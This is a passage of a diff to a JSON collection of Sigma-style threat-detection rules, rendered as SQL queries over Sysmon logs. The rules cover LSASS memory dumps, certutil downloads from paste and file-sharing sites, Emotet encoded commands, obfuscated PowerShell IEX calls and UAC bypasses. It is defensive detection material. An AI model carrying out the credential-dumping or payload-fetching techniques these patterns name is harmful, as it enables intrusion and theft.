'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_delete_all.yml" + "filename": 
"proc_creation_win_rundll32_js_runhtmlapplication.yml" }, { - "title": "Hermetic Wiper TG Process Patterns", - "id": "2f974656-6d83-4059-bbdf-68ac5403422f", + "title": "Active Directory Structure Export Via Ldifde.EXE", + "id": "4f7a6757-ff79-46db-9687-66501a02d9ec", "status": "experimental", - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND CommandLine LIKE '%-f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" + "filename": "proc_creation_win_ldifde_export.yml" }, { - "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage", - "id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", + "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", + "id": 
"42a5f1e7-9603-4f6d-97ae-3f37d130d794", "status": "experimental", - "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion" - ], - "falsepositives": [ - "Installation of unsigned packages for testing purposes" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AppPackage %' ESCAPE '\\' OR CommandLine LIKE '%Add-AppxPackage %' ESCAPE '\\') AND CommandLine LIKE '% -AllowUnsigned%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml" - }, - { - "title": "Fireball Archer Install", - "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", - "status": "test", - "description": "Detects Archer malware invocation via rundll32", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%InstallArcherSvc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR 
CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_fireball.yml" + "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" }, { - "title": "Files And Subdirectories Listing Using Dir", - "id": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", + "title": "Active Directory Structure Export Via Csvde.EXE", + "id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", "status": "experimental", - "description": "Detects usage of the \"dir\" command that's part of windows batch/cmd to collect information about directories", - "author": "frack113", + "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1217" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND 
CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /b%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\csvde.exe' ESCAPE '\\' OR OriginalFileName = 'csvde.exe') AND CommandLine LIKE '% -f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_dir_execution.yml" + "filename": "proc_creation_win_csvde_export.yml" }, { - "title": "Exploited CVE-2020-10189 Zoho ManageEngine", - "id": "846b866e-2a57-46ee-8e16-85fa92759be7", + "title": "Pingback Backdoor Activity", + "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", "status": "test", - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2020_10189.yml" + "filename": "proc_creation_win_malware_pingback_backdoor.yml" }, { - "title": "Sysmon Configuration Update", - "id": "87911521-7098-470b-a459-9a57fc80bdfd", + "title": "Execute Files with Msdeploy.exe", + "id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", "status": "test", - "description": "Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects file execution using the msdeploy.exe lolbin", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate administrators might use this command to update Sysmon configuration." 
+ "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-c%' ESCAPE '\\' OR CommandLine LIKE '%/c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%verb:sync%' ESCAPE '\\' AND CommandLine LIKE '%-source:RunCommand%' ESCAPE '\\' AND CommandLine LIKE '%-dest:runCommand%' ESCAPE '\\' AND Image LIKE '%\\\\msdeploy.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml" + "filename": "proc_creation_win_lolbin_msdeploy.yml" }, { - "title": "Potential LSASS Process Dump Via Procdump", - "id": "5afee48e-67dd-4e03-a783-f74259dcf998", - "status": "stable", - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "author": "Florian Roth (Nextron Systems)", + "title": "Persistence Via TypedPaths - CommandLine", + "id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. 
Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" + "attack.persistence" ], "falsepositives": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" + "filename": "proc_creation_win_registry_typed_paths_persistence.yml" }, { - "title": "HackTool - WinRM Access Via Evil-WinRM", - "id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", - "status": "test", - "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "title": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", + "id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", + "status": "experimental", + "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. 
This is often used by pentester and attacker enumeration scripts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ruby.exe' ESCAPE '\\' AND CommandLine LIKE '%-i %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '% qfe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_evil_winrm.yml" + "filename": "proc_creation_win_wmic_recon_hotfix.yml" }, { - "title": "Execution via Diskshadow.exe", - "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "title": "Trickbot Malware Reconnaissance Activity", + "id": "410ad193-a728-4107-bc79-4419789fcbf8", "status": "test", - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "author": "Ivan Dyachkov, oscd.community", + "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", + "author": "David Burkett, Florian Roth", "tags": [ - "attack.execution", - "attack.t1218" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." 
+ "Rare System Admin Activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND Image LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_diskshadow.yml" + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" }, { - "title": "ZOHO Dctask64 Process Injection", - "id": "6345b048-8441-43a7-9bed-541133633d7a", + "title": "HackTool - DInjector PowerShell Cradle Execution", + "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", "status": "test", - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055.001" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" + "filename": "proc_creation_win_hktl_dinjector.yml" }, { - "title": "UAC Bypass Using ChangePK and SLUI", - "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", + "title": "Invoke-Obfuscation Obfuscated IEX 
Invocation", + "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "status": "test", - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" }, { - "title": "Potential Emotet Activity", - "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "status": "stable", - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", - "author": "Florian Roth (Nextron Systems)", + "title": "Rundll32 Execution Without Parameters", + "id": 
"5bb68627-3198-40ca-b458-49f973db8752", + "status": "test", + "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "author": "Bartlomiej Czyz, Relativity", "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "False positives may occur if a user called rundll32 from CLI with no options" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine IN 
('rundll32.exe', 'rundll32'))" ], - "filename": "proc_creation_win_malware_emotet.yml" + "filename": "proc_creation_win_rundll32_without_parameters.yml" }, { - "title": "Usage Of Web Request Commands And Cmdlets", - "id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", + "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", "status": "test", - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", - "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.execution", + "attack.persistence", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
+ "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR CommandLine LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" + "filename": "proc_creation_win_schtasks_reg_loader.yml" }, { - "title": "File Download Via Bitsadmin To A Suspicious Target Folder", - "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious MSHTA Child Process", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "status": "test", + "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", + "author": "Michael Haag", "tags": [ 
"attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" ], "falsepositives": [ - "Unknown" + "Printer software / driver installations", + "HP software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + "filename": "proc_creation_win_mshta_susp_child_processes.yml" }, { - "title": "PUA - NirCmd 
Execution", - "id": "4e2ed651-1906-4a59-a78a-18220fca1b22", + "title": "Launch-VsDevShell.PS1 Proxy Execution", + "id": "45d3a03d-f441-458c-8883-df101a3bb146", "status": "experimental", - "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1216.001" ], "falsepositives": [ - "Legitimate use by administrators" + "Legitimate usage of the script by a developer" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NirCmd.exe' ESCAPE '\\' OR OriginalFileName = 'NirCmd.exe' OR (CommandLine LIKE '% execmd %' ESCAPE '\\' OR CommandLine LIKE '%.exe script %' ESCAPE '\\' OR CommandLine LIKE '%.exe shexec %' ESCAPE '\\' OR CommandLine LIKE '% runinteractive %' ESCAPE '\\')) OR ((CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% exec2 %' ESCAPE '\\') AND (CommandLine LIKE '% show %' ESCAPE '\\' OR CommandLine LIKE '% hide %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Launch-VsDevShell.ps1%' ESCAPE '\\' AND (CommandLine LIKE '%VsWherePath %' ESCAPE '\\' OR CommandLine LIKE '%VsInstallationPath %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nircmd.yml" + "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml" }, { - "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", - "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "title": "Winrar Execution in Non-Standard Folder", + "id": 
